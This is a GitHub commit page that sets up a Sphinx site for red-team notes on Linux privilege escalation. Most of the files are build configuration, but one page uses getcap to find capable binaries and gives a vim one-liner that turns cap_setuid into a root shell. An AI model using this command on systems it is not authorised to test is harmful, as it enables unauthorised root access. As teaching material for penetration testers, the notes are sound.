Skip to content

Commit

Permalink
Initial commit
Browse files Browse the repository at this point in the history
  • Loading branch information
ninabarzh committed Sep 26, 2022
1 parent a6b8c93 commit d27ffca
Show file tree
Hide file tree
Showing 23 changed files with 869 additions and 2 deletions.
28 changes: 28 additions & 0 deletions .github/workflows/documentation.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
name: Publish Monkeys using Sphinx

on:
push:
branches:
- 'main'

jobs:
build-docs:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- uses: actions/setup-python@v3
- name: Install dependencies
run: |
pip install sphinx==5.1.0 sphinx_rtd_theme myst-parser sphinx-markdown-tables
- name: Build documentation
run: |
make html
- name: Deploy
uses: peaceiris/actions-gh-pages@v3
if: ${{ github.event_name == 'push' && github.ref == 'refs/heads/main' }}
with:
publish_branch: gh-pages
github_token: ${{ secrets.GITHUB_TOKEN }}
publish_dir: build/html/
force_orphan: true
33 changes: 33 additions & 0 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# Mac custom attributes file (Desktop Service Store)
.DS_Store

# PyCharm files
.idea/

# Instance Folder - used for run-time files
instance/*.cfg
instance/*.db
instance/*.log
instance/*.log*

# Log Files
instance/logs/
*.log

# Coverage output
.coverage
htmlcov/

# Virtual Environment
/venv/

# pytest files
.pytest_cache/

# Not the static site, will be generated on push
build/
20 changes: 20 additions & 0 deletions Makefile
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
# Minimal makefile for Sphinx documentation
#

# You can set these variables from the command line, and also
# from the environment for the first two.
SPHINXOPTS ?=
SPHINXBUILD ?= sphinx-build
SOURCEDIR = source
BUILDDIR = build

# Put it first so that "make" without argument is like "make help".
help:
@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)

.PHONY: help Makefile

# Catch-all target: route all unknown targets to Sphinx using the new
# "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
%: Makefile
@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
34 changes: 32 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,2 +1,32 @@
# red-escalation
Privilege escalation
# Monkeys

![Publish Monkeys using Sphinx](https://github.com/tymyrddin/red-escalation/workflows/Publish%20Monkeys%20using%20Sphinx/badge.svg?branch=main)
Deployed: https://tymyrddin.github.io/red-escalation/

Built with [Sphinx](https://www.sphinx-doc.org) using a [theme](https://github.com/readthedocs/sphinx_rtd_theme) provided
by [Read the Docs](https://readthedocs.org/).

## Requirements

* sphinx — sphinx package
* sphinx-rtd-theme — a theme package
* myst-parser — parsing `.md` files
* sphinx-markdown-tables — package for Markdown tables support

## Usage

Add or change documents in the source folder.

Make the build:
```bash
$ make html
```

## Problems or Suggestions

This project welcomes contributions and suggestions.

[Open an issue here](https://github.com/tymyrddin/red-escalation/issues)

## Mind
Where you stand depends on where you sit, and all threats are cross-vector threats. Without a clear mandate for testing, measuring and reporting actual improvements in security, attempts at improving security makes absolutely no sense, not even for the low-hanging fruit.
35 changes: 35 additions & 0 deletions make.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
@ECHO OFF

pushd %~dp0

REM Command file for Sphinx documentation

if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set SOURCEDIR=source
set BUILDDIR=build

%SPHINXBUILD% >NUL 2>NUL
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.https://www.sphinx-doc.org/
exit /b 1
)

if "%1" == "" goto help

%SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
goto end

:help
%SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%

:end
popd
36 changes: 36 additions & 0 deletions source/_static/css/custom.css
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
h1 {
color: #DD0000;
}

a {
color: #DD0000;
}

a:hover {
color: #FF0000;
}

.wy-nav .wy-menu-vertical header {
color: #DD0000
}

.wy-menu-vertical header, .wy-menu-vertical p.caption {
color: #DD0000;
}

.wy-side-nav-search {
background-color: #333333;
color: #fcfcfc;
}

.wy-side-nav-search input[type="text"] {
width: 100%;
border-radius: 0px;
padding: 6px 12px;
border-color: #DD0000;
}

.highlight {
background: #333;
color: #ddd;
}
4 changes: 4 additions & 0 deletions source/_templates/footer.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
{% extends "!footer.html" %}
{%- block contentinfo %}
<a href="https://uu.tymyrddin.dev">Unseen University</a>, 2022
{% endblock %}
99 changes: 99 additions & 0 deletions source/conf.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,99 @@
# Configuration file for the Sphinx documentation builder.
#
# For the full list of built-in configuration values, see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html

# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information

project = 'Monkeys know what tree to climb'
copyright = '2022, Ty Myrddin'
author = 'Ty Myrddin'
release = '0.1'

# -- General configuration ---------------------------------------------------

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'myst_parser',
'sphinx_markdown_tables',
'sphinx.ext.intersphinx',
]

source_suffix = ['.rst', '.md']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []


# -- Options for HTML output -------------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'

html_theme_options = {
'display_version': True,
'prev_next_buttons_location': 'bottom',
'style_external_links': True,
# Toc options
'collapse_navigation': False,
'sticky_navigation': False,
'navigation_depth': 3,
'includehidden': True,
'titles_only': False
}

html_title = "Monkeys know what tree to climb"
html_logo = "img/logo.png"
html_favicon = "img/favicon.ico"


# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# These paths are either relative to html_static_path
# or fully qualified paths (eg. https://...)
html_css_files = [
'css/custom.css',
]

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False


# Intersphinx
intersphinx_mapping = {
"attack-trees": ("https://tymyrddin.github.io/attack-trees/", None),
"cheatsheets": ("https://tymyrddin.github.io/cheatsheets/", None),
"e2ee-threat-model":("https://tymyrddin.github.io/e2ee-threat-model/", None),
"da-threat-model":("https://tymyrddin.github.io/da-threat-model/", None),
"se-threat-model":("https://tymyrddin.github.io/se-threat-model/", None),
"app-threat-model":("https://tymyrddin.github.io/app-threat-model/", None),
"cicd-threat-model":("https://tymyrddin.github.io/cicd-threat-model/", None),
"linux-pc-mitigations":("https://tymyrddin.github.io/linux-pc-mitigations/", None),
"linux-server-mitigations":("https://tymyrddin.github.io/linux-server-mitigations/", None),
"data-mitigations":("https://tymyrddin.github.io/data-mitigations/", None),
"webserver-mitigations":("https://tymyrddin.github.io/webserver-mitigations/", None),
"mailserver-mitigations":("https://tymyrddin.github.io/mailserver-mitigations/", None),
"network-mitigations":("https://tymyrddin.github.io/network-mitigations/", None),
"app-mitigations": ("https://tymyrddin.github.io/app-mitigations/", None),
"android-mitigations": ("https://tymyrddin.github.io/android-mitigations/", None),
"windows-pc-mitigations": ("https://tymyrddin.github.io/windows-pc-mitigations/", None),
"macos-mitigations": ("https://tymyrddin.github.io/macos-mitigations/", None),
"ios-mitigations": ("https://tymyrddin.github.io/ios-mitigations/", None),
}
myst_url_schemes = ["http", "https", ]
29 changes: 29 additions & 0 deletions source/docs/linux/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
# Introduction

## What?

There are many ways to escalate linux privileges. These are the most common methods based on common real-world
misconfigurations and flaws.

## Why?

Gain access to additional users, hosts, and resources, be able to take action, like install software, to get user
data that can possibly give access to even more sites or systems, destroy or alter audit trails to hide tracks of
having been there, etc.

## How?

* [Kernel vulnerability exploits](kernel.md)
* [Exploit sudo misconfigurations](sudo.md)
* [SUID and SGID exploits](suid.md)
* [Exploit capable programs](capabilities.md)
* [Cron jobs exploits](cron.md)
* [Path exploits](path.md)
* [NFS exploits](nfs.md)
* [Linux escalation resources](resources.md)






35 changes: 35 additions & 0 deletions source/docs/linux/capabilities.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
# Exploit capable programs

## Attack tree

```text
1 Become root on Linux via capabilities
1.1 Check for capable programs
1.2 Leverage program
```

## Example: vim

To check for capable programs, use the `getcap` tool:
```text
karen@target:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
```

[Leverage vim](https://gtfobins.github.io/gtfobins/vim/) and execute a shell using python:

```text
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
```

## Notes

Another method system administrators can use to increase the privilege level of a process or binary is by capabilities.
Capabilities help manage privileges at a more granular level. If a SOC analyst needs to use a tool that needs to
initiate socket connections, the capabilities of the binary can be changed such that it would get through its task
without needing a higher privilege user.
Loading

0 comments on commit d27ffca

Please sign in to comment.